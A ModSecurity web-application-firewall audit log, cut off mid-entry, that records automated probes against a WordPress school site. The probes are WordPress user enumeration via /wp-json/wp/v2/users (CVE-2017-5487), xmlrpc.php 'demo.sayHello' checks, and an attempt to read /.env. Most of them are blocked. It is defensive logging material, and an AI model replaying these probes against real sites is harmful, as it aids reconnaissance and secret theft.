p2=3767, p3=34, p4=37, p5=93, sr=99, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03ecf206-Z-- --0550c94d-A-- [08/May/2025:11:02:02 +0700] aBwsuqcs1DvJ_HgMHE_yLAAAAAo 103.236.140.4 43812 103.236.140.4 8181 --0550c94d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0550c94d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0550c94d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676922125130 3229 (- - -) Stopwatch2: 1746676922125130 3229; combined=1421, p1=476, p2=911, p3=0, p4=0, p5=33, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0550c94d-Z-- --4005f008-A-- [08/May/2025:11:02:03 +0700] aBwsu6cs1DvJ_HgMHE_yLQAAAA0 103.236.140.4 43814 103.236.140.4 8181 --4005f008-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4005f008-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4005f008-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676923517437 2007 (- - -) Stopwatch2: 1746676923517437 2007; combined=822, p1=280, p2=518, p3=0, p4=0, p5=23, sr=48, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4005f008-Z-- --d42ac21a-A-- [08/May/2025:11:02:05 +0700] aBwsvY4K347NtBcwXKwGWAAAAIM 103.236.140.4 43820 103.236.140.4 8181 --d42ac21a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.162 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d42ac21a-C-- demo.sayHello --d42ac21a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d42ac21a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676925994580 4826 (- - -) Stopwatch2: 1746676925994580 4826; combined=3749, p1=453, p2=3090, p3=25, p4=25, p5=91, sr=67, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d42ac21a-Z-- --c7c51245-A-- [08/May/2025:11:02:06 +0700] aBwsvqcs1DvJ_HgMHE_yLgAAAAs 103.236.140.4 43822 103.236.140.4 8181 --c7c51245-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c7c51245-C-- demo.sayHello --c7c51245-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7c51245-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676926758836 5364 (- - -) Stopwatch2: 1746676926758836 5364; combined=4026, p1=514, p2=3301, p3=29, p4=31, p5=89, sr=79, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7c51245-Z-- --b33b1661-A-- [08/May/2025:11:02:19 +0700] aBwsy6cs1DvJ_HgMHE_yMAAAABA 103.236.140.4 43832 103.236.140.4 8181 --b33b1661-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b33b1661-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b33b1661-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676939889118 2862 (- - -) Stopwatch2: 1746676939889118 2862; combined=1260, p1=451, p2=779, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b33b1661-Z-- --7a6eed08-A-- [08/May/2025:11:02:23 +0700] aBwsz8P9GxxPAbCroFbNGQAAAEw 103.236.140.4 43836 103.236.140.4 8181 --7a6eed08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.151 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7a6eed08-C-- demo.sayHello --7a6eed08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a6eed08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676943302464 4636 (- - -) Stopwatch2: 1746676943302464 4636; combined=3641, p1=430, p2=3013, p3=22, p4=25, p5=89, sr=64, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a6eed08-Z-- --cfc46d69-A-- [08/May/2025:11:02:26 +0700] aBws0sP9GxxPAbCroFbNGgAAAFE 103.236.140.4 43840 103.236.140.4 8181 --cfc46d69-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.158 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cfc46d69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfc46d69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676946564167 2392 (- - -) Stopwatch2: 1746676946564167 2392; combined=1063, p1=366, p2=662, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfc46d69-Z-- --242f4022-A-- [08/May/2025:11:02:29 +0700] aBws1acs1DvJ_HgMHE_yMwAAABY 103.236.140.4 43846 103.236.140.4 8181 --242f4022-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.158 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --242f4022-C-- demo.sayHello --242f4022-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --242f4022-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676949955854 5015 (- - -) Stopwatch2: 1746676949955854 5015; combined=3875, p1=450, p2=3215, p3=21, p4=24, p5=95, sr=67, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --242f4022-Z-- --1c869f6b-A-- [08/May/2025:11:03:09 +0700] aBws_acs1DvJ_HgMHE_yNAAAAAA 103.236.140.4 43850 103.236.140.4 8181 --1c869f6b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1c869f6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c869f6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676989398406 3635 (- - -) Stopwatch2: 1746676989398406 3635; combined=1548, p1=515, p2=996, p3=0, p4=0, p5=37, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c869f6b-Z-- --e4a4b937-A-- [08/May/2025:11:03:12 +0700] aBwtAMP9GxxPAbCroFbNHAAAAFU 103.236.140.4 43856 103.236.140.4 8181 --e4a4b937-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.86 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e4a4b937-C-- demo.sayHello --e4a4b937-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4a4b937-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676992763041 5207 (- - -) Stopwatch2: 1746676992763041 5207; combined=3887, p1=520, p2=3154, p3=28, p4=32, p5=91, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4a4b937-Z-- --0618df5b-A-- [08/May/2025:11:04:28 +0700] aBwtTKcs1DvJ_HgMHE_yOAAAABg 103.236.140.4 43862 103.236.140.4 8181 --0618df5b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 209.38.88.126 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 209.38.88.126 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --0618df5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0618df5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746677068820018 794 (- - -) Stopwatch2: 1746677068820018 794; combined=335, p1=294, p2=0, p3=0, p4=0, p5=41, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0618df5b-Z-- --614caf73-A-- [08/May/2025:11:04:48 +0700] aBwtYKcs1DvJ_HgMHE_yOgAAAAU 103.236.140.4 43866 103.236.140.4 8181 --614caf73-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --614caf73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --614caf73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677088413153 2959 (- - -) Stopwatch2: 1746677088413153 2959; combined=1221, p1=419, p2=773, p3=0, p4=0, p5=29, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --614caf73-Z-- --b993be7e-A-- [08/May/2025:11:04:50 +0700] aBwtYqcs1DvJ_HgMHE_yPAAAAAM 103.236.140.4 43870 103.236.140.4 8181 --b993be7e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b993be7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b993be7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677090265295 2222 (- - -) Stopwatch2: 1746677090265295 2222; combined=1012, p1=322, p2=648, p3=0, p4=0, p5=41, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b993be7e-Z-- --a73c1a7c-A-- [08/May/2025:11:04:50 +0700] aBwtYsP9GxxPAbCroFbNHQAAAFI 103.236.140.4 43872 103.236.140.4 8181 --a73c1a7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a73c1a7c-C-- demo.sayHello --a73c1a7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a73c1a7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677090674786 5479 (- - -) Stopwatch2: 1746677090674786 5479; combined=4127, p1=557, p2=3353, p3=30, p4=31, p5=93, sr=86, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a73c1a7c-Z-- --9786a925-A-- [08/May/2025:11:04:53 +0700] aBwtZSs5rYyn3jlLjjK_dQAAANA 103.236.140.4 43878 103.236.140.4 8181 --9786a925-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9786a925-C-- demo.sayHello --9786a925-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9786a925-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677093115651 4739 (- - -) Stopwatch2: 1746677093115651 4739; combined=3682, p1=465, p2=2981, p3=22, p4=26, p5=107, sr=68, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9786a925-Z-- --f0173342-A-- [08/May/2025:11:05:18 +0700] aBwtfqcs1DvJ_HgMHE_yPgAAAAo 103.236.140.4 43882 103.236.140.4 8181 --f0173342-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f0173342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0173342-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677118643105 3266 (- - -) Stopwatch2: 1746677118643105 3266; combined=1435, p1=493, p2=909, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0173342-Z-- --f2618445-A-- [08/May/2025:11:05:22 +0700] aBwtgqcs1DvJ_HgMHE_yQAAAAAs 103.236.140.4 43886 103.236.140.4 8181 --f2618445-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.3 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f2618445-C-- demo.sayHello --f2618445-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2618445-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677122665087 5474 (- - -) Stopwatch2: 1746677122665087 5474; combined=4034, p1=524, p2=3298, p3=29, p4=31, p5=90, sr=75, sw=62, 